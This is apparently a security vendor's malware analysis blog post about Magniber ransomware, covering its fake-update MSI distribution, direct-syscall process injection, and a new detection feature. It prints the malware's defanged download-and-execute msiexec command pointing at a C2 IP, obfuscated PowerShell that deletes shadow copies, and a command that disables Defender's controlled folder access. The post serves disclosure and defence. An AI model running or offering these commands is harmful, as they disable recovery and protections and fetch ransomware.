V3 Detects and Blocks Magniber Ransomware Injection (Direct Syscall Detection)

Malware Analysis
1

The Magniber ransomware is consistently being distributed at high volumes. It has been distributed through the IE (Internet Explorer) vulnerability for the past few years but stopped exploiting the vulnerability after the support for the browser ended. Recently, the ransomware is distributed with filenames disguised as a Windows security update package (e.g. ERROR.Center.Security.msi) in Edge and Chrome browsers. Magniber at the moment injects the ransomware into a running process, having this process cause damage by encrypting the user’s files.

This post will explain the infection flow of Magniber currently being distributed, its ransomware injection method, and V3’s new detection method (Direct Syscall Detection). Figure 1 shows the infection process flow of the Magniber ransomware. It is being distributed while being disguised as a security update package, having a file name such as “ERROR.Center.Security.msi”. Upon being executed, it injects the ransomware code into a running process to encrypt files. Afterward, it adds a command to the task scheduler for persistence and deletes volume shadow copies to disable recovery.

Figure 1. Infection flow diagram of Magniber

Figure 2 shows the code which injects Magniber into a running process. The handle of a running process is looked up, and the injection function (Inject_Magniber) is run in a loop statement (for).

Figure 2. Main injector function of Magniber

Figures 3 to 5 show the function which injects the ransomware into a running process (Inject_Magniber). The API used for injection runs NtCreateThreadEx, NtGetContextThread, NtSetContextThread, and NtResumeThread in order and injects the ransomware into a process running in the user environment. 

Figure 3. A portion of the injection function (Inject_Magniber) 1
Figure 4. A portion of the injection function (Inject_Magniber) 2
Figure 5. A portion of the injection function (Inject_Magniber) 3

The function shows how it bypasses the user mode hooking method when the API is executed for injection. To bypass the user mode hooking method (see Figure 6), Magniber calls the syscall command of the API (NtCreateThreadEx) in a location not in ntdll.dll (0x000001C87630012). This bypassing method, known as Direct Syscall, can be detected through the new feature in V3 (Direct Syscall Detection).

Figure 6. Abnormal syscall call (called outside ntdll.dll)
Figure 7. Normal syscall call (called from within ntdll.dll)

Figure 8 shows an obfuscated command registered to the task scheduler for Magniber to maintain persistence. The decrypted task scheduler command is shown below. When the system is booted up, the command downloads and executes the Magniber ransomware (.msi).

Figure 8. Persistence routine of Magniber (registering a command to the task scheduler)
  • Decrypted task scheduler command
    cmd /v /c msiexec /i hxxp://146[.]19[.]106[.]31/ceggfnhm.msi /q

To incapacitate file recovery by the operating system, Magniber uses a PowerShell command to execute an obfuscated command to delete volume shadow copies. The decrypted version of this command is as follows.

  • Command to delete volume shadow copies (obfuscated)
    $y=$env:d;$o=$y[16]+$y[18]+$y[34]+$y[8]+$y[32]+$y[9]+$y[25]+$y[13]+$y[20]+$y[30]+$y[27]+$y[34]+$y[6]+$y[8]+$y[2]+$y[9]+$y[13]+$y[22]+$y[24]+$y[5]+$y[11]+$y[26]+$y[10]+$y[31]+$y[1]+$y[36]+$y[4]+$y[14]+$y[36]+$y[29]+$y[28]+$y[33]+$y[35]+$y[0]+$y[34]+$y[3]+$y[34]+$y[8]+$y[34]+$y[16]+$y[33];iex($o)
  • Command to delete volume shadow copies (decrypted)
    Get-WmiObject Win32_ShadowCopy).Delete()

Then it runs a command to turn off the controlled folder access feature of Windows Defender. The obfuscated and decrypted versions of this command are as follows.

  • Command to turn off the controlled folder access feature of Windows Defender (obfuscated)
    $x=$env:n;$l=$x[17]+$x[10]+$x[22]+$x[29]+$x[31]+$x[2]+$x[26]+$x[5]+$x[10]+$x[19]+$x[10]+$x[5]+$x[10]+$x[23]+$x[14]+$x[10]+$x[13]+$x[29]+$x[0]+$x[23]+$x[9]+$x[6]+$x[11]+$x[10]+$x[7]+$x[18]+$x[23]+$x[22]+$x[5]+$x[18]+$x[11]+$x[11]+$x[10]+$x[12]+$x[24]+$x[18]+$x[11]+$x[12]+$x[10]+$x[5]+$x[3]+$x[14]+$x[14]+$x[10]+$x[30]+$x[30]+$x[13]+$x[1];
  • Command to turn off the controlled folder access feature of Windows Defender (decrypted)
    Set-MpPreference -EnableControlledFolderAccess 0

After encrypting user files, Magniber creates ransom notes (readme.htm) in the directories containing encrypted files and presents a guide on using the Tor browser to access a certain URL for file recovery. The accessed page is shown in Figure 10 where Bitcoins are demanded to recover files.

Figure 9. Ransom note of Magniber
Figure 10. Browser screen after connecting to the URL in the ransom note

Magniber is currently being distributed in a typosquatting method that exploits typos made when entering domains, targeting Chrome and Edge users with the latest Windows version. As users may download ransomware by entering incorrect domains, extra caution is required.

AhnLab is currently responding to Magniber as shown in the following:

[Magniber Behavior Detection]
– Ransom/MDP.Magniber.M4687 (2022.08.03.03)
– Ransom/MDP.Magniber.M4683 (2022.07.19.00)

[Magniber File Detection]
– Ransomware/Win.Magniber.R592250 (2023.07.18.03)

[Magniber msi MD5]
f5dd30f503577071499a241532479279  

[C2 URL]
hxxp://146[.]19[.]106[.]31/ceggfnhm.msi

Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.

The post V3 Detects and Blocks Magniber Ransomware Injection (Direct Syscall Detection) appeared first on ASEC BLOG.

Article Link: V3 Detects and Blocks Magniber Ransomware Injection (Direct Syscall Detection) - ASEC BLOG